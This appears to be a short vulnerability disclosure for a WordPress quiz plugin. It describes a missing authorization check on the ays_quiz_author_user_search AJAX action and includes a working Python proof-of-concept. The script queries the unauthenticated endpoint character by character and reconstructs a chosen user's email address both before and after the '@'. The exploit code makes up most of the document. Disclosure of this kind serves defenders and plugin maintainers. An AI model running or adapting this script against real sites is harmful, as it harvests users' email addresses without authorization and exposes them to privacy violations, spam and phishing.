Description The plugin does not adequately authorize the ays_quiz_author_user_search
AJAX action, allowing an unauthenticated attacker to perform a search for users of the system, ultimately leaking user email addresses.
import string
import requests
base_url = 'http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=ays_quiz_author_user_search&search='
id_to_find = 1
letter_candidates = string.ascii_lowercase + string.digits + '-_.'
email = '@'
# Find letters after @
while True:
print("current email", email)
for letter in letter_candidates:
query = email + letter
data = requests.get(base_url + query).json()
if id_to_find in [item['id'] for item in data['results']]:
email = query
break
else:
break
# Find letters before @
while True:
print("current email", email)
for letter in letter_candidates:
query = letter + email
data = requests.get(base_url + query).json()
if id_to_find in [item['id'] for item in data['results']]:
email = query
break
else:
break